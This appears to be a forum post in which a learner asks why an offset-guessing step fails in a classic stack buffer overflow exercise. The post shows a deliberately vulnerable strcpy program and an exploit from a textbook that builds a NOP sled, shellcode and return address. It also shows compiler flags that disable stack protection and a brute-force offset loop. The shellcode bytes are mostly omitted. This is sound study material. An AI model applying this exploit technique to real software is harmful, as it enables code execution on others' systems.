To understand the buffer overflow concept, I wrote a small program called overflow.c:
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]){
    char buffer[100];
    if(argc > 1){
        strcpy(buffer, argv[1]);
    }
    else{
        printf("Please give a string to the program\n");
    }
}
As you can see, there is no length check before the command-line input is copied into the 100-byte array called buffer.
Next, I took another code sample (from Hacking: The Art of Exploitation, a great book by the way). In my case, it looks like this:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

//shellcode has 50 bytes of data
char shellcode[]="\xeb\x1a\x5e......[SKIPPED]......\x4b"; // (*)

int main(int argc, char *argv[]) {
    unsigned int i, *ptr, ret, offset=0;
    char *command, *buffer;

    command = (char *) malloc(200);
    bzero(command, 200); // Zero out the new memory.
    strcpy(command, "./overflow \'"); // Start command buffer (**)
    buffer = command + strlen(command); // Set buffer at the end.

    if(argc > 1){ // Set offset.
        offset = atoi(argv[1]);
    }
    ret = (unsigned int) &i - offset; // Set return address.

    for(i=0; i < 150; i+=4){ // Fill buffer with return address. (***)
        *((unsigned int *)(buffer+i)) = ret;
    }
    memset(buffer, 0x90, 50); // Build NOP sled.
    memcpy(buffer+50, shellcode, sizeof(shellcode)-1);
    strcat(command, "\'");

    system(command); // Run exploit.
    free(command);
}
So, what I did is the following. At (*) I changed the shellcode array because my opcodes are different; I have also omitted most of it here. It still performs an execve syscall (the typical /bin/sh). At (**) I changed the "Start command buffer" line to "./overflow", and the offset defaults to 0. Since my shellcode is 50 bytes long, I also changed the loop bound at (***).
What I understand: I understand the NOP sled part and why we need to know the target return address in advance.
What I do not understand is the offset-guessing part. Therefore I drew two sketches on a piece of paper:
Heap and Stack of exploit_overflow.c
Lower Address
------------------+
| | |
| ----------------- | v
| | *buffer -----+ +-----------+----------+-----------+-----+
Heap ---------------- | | | | |
| | *command ----+ |./overflow | NOP sled | Shellcode | RET |
v ----------------- | | | | | |
| . | | +-----------+----------+-----------+-----+
| . | | ^
| . | | |
| . | +-----+
-----------------
| offset | ^
----------------- |
| ret | |
----------------- |
| *ptr | |
----------------- |
| i | Stack
----------------- |
| old ebp | |
----------------- |
| return address| |
----------------- |
| argc | |
----------------- |
| argv[] | |
-----------------
Higher Address
So, the book says that the variable i is taken as the point of reference: an offset (which is guessed experimentally) is subtracted from the address of i. When I compute the address of i minus the guessed offset, I get another address. Is that my target address? They assign that address to the variable ret, but why? My goal is to reach an address within the NOP sled, right? Whenever I try to guess an offset, I always get a "Segmentation fault". I guess that means I am not choosing the right offset, right? If so, can somebody tell me why?
Note:
1) When compiling, I use the options -fno-stack-protector and -z execstack.
2) To guess the offset, I use the recommended Bash for loop:
for i in $(seq 0 30 300)
do
    echo Trying offset $i
    ./exploit_overflow $i
done
But every time I get a segmentation fault.
I hope somebody can help.
Best regards,